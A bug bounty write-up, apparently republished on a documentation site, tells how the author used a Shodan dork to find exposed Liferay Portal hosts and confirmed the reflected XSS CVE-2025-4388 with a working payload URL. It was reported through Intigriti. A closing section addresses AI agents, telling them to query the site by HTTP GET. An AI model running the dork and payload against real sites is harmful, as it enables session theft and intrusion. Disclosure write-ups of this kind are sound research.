# I Asked Shodan, It Gave Me a Bounty Says ‘Sure, Why Not?’” $$

Hello Hunters! I’m Abdelrahman (A0xtrojan), and I’m excited to share my write-up with you, found in a public program on in intigriti. So, without wasting time, let’s dive right in.

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/0*4Esrq7KV8s6ic2cL.jpg" alt="" height="700" width="700"><figcaption></figcaption></figure>

In the last days of my bug bounty journey i decided to learn new techniques for my recon process, so here what i I never learned it before? , yeah that’s shodan , for my luck i have good friend Suggested to me a great video for learning shdoan by the master of recon [Orwa Atyat](https://medium.com/u/7ab3832ef76d) , i will put the link at the end , so let’s continue

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/0*nGddunLz99eBaFkO.jpg" alt="" height="700" width="700"><figcaption><p>lets go</p></figcaption></figure>

> *One day, while I was preparing a write-up for a newly discovered CVE, I came across another researcher’s write-up covering the same vulnerability. It was an unexpected coincidence, but it pushed me to dig deeper and refine my own analysis.*

<figure><img src="https://miro.medium.com/v2/resize:fit:509/0*SL0WUwraUg8cYzll.gif" alt="" height="250" width="339"><figcaption></figcaption></figure>

### Theory: Understanding CVE-2025–4388 (Liferay Portal RXSS) <a href="#id-4436" id="id-4436"></a>

**CVE-2025–4388** is a **Reflected Cross-Site Scripting (RXSS)** A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.5, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 7.4 GA through update 92 allows an remote non-authenticated attacker to inject JavaScript into the modules/apps/marketplace/marketplace-app-manager-web.

### Affected Software <a href="#fccf" id="fccf"></a>

* **Liferay Portal (Multiple versions likely affected before patch)**
* Vulnerable when rendering unsanitized query strings in:
* `meta refresh tags`
* redirect URLs
* certain `GET` parameters in guest/public pages

To discover targets vulnerable to CVE-2025–4388, you can use **Shodan**, **Censys**, or similar search engines to look for internet-exposed Liferay instances.

**The Setup**

In the first I prepared Shodan for search on the target domain IPs so used that dork :

```
html:"liferayPortalCSS"
```

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/1*BEuDMQ-TNyv7SJzT1RPuBg.png" alt="" height="377" width="700"><figcaption></figcaption></figure>

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/1*idWVq6ZkHequuNZjfImzZQ.png" alt="" height="41" width="700"><figcaption></figcaption></figure>

Now after selecting the target we have to use this payload for exploiting RXSS

```
/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
```

Results : XSS Executed.

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/1*Ir6cXQC3dYGyds66gMzBpw.png" alt="" height="217" width="700"><figcaption></figcaption></figure>

<figure><img src="https://miro.medium.com/v2/resize:fit:540/0*hnctgKTRqJYKveYG.gif" alt="" height="203" width="360"><figcaption><p>hacking</p></figcaption></figure>

### Impact: <a href="#id-652b" id="id-652b"></a>

* Exploitable on public-facing portals
* Allows:
* Cookie theft
* Phishing/redirection
* Session hijacking

So after Reporting to Skoda on intigriti Accepted $$

<figure><img src="https://miro.medium.com/v2/resize:fit:747/0*o7iC1g9hOC_YZmx1.gif" alt="" height="359" width="498"><figcaption></figcaption></figure>

Thank you for you time reading my writeup and i will publish the next Vulnerability soon :) and hope from you to share, like and support my Writeups :) stay safe

Follow me on Social Media :

[LinkedIn](https://www.linkedin.com/in/abdelrahman-tamer-6a932924a/) | [X](https://x.com/A0xTrojan) | [Youtube](https://www.youtube.com/channel/UC7smGv7AAcXMY5rrCpP5t8A) | [Facebook](https://www.facebook.com/abdo.tamer.313)

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/1*ZUhuHdJX7ZW1u3Rp4RdSkg.jpeg" alt="" height="380" width="700"><figcaption></figcaption></figure>

Press enter or click to view image in full size

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/0*I6WXh1fF6OpULIjE" alt="" height="399" width="700"><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://get-bountyordie.gitbook.io/get-bountyordie-docs/our-write-ups/web-pentest-write-ups/i-asked-shodan-it-gave-me-a-bounty-says-sure-why-not-usdusd.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.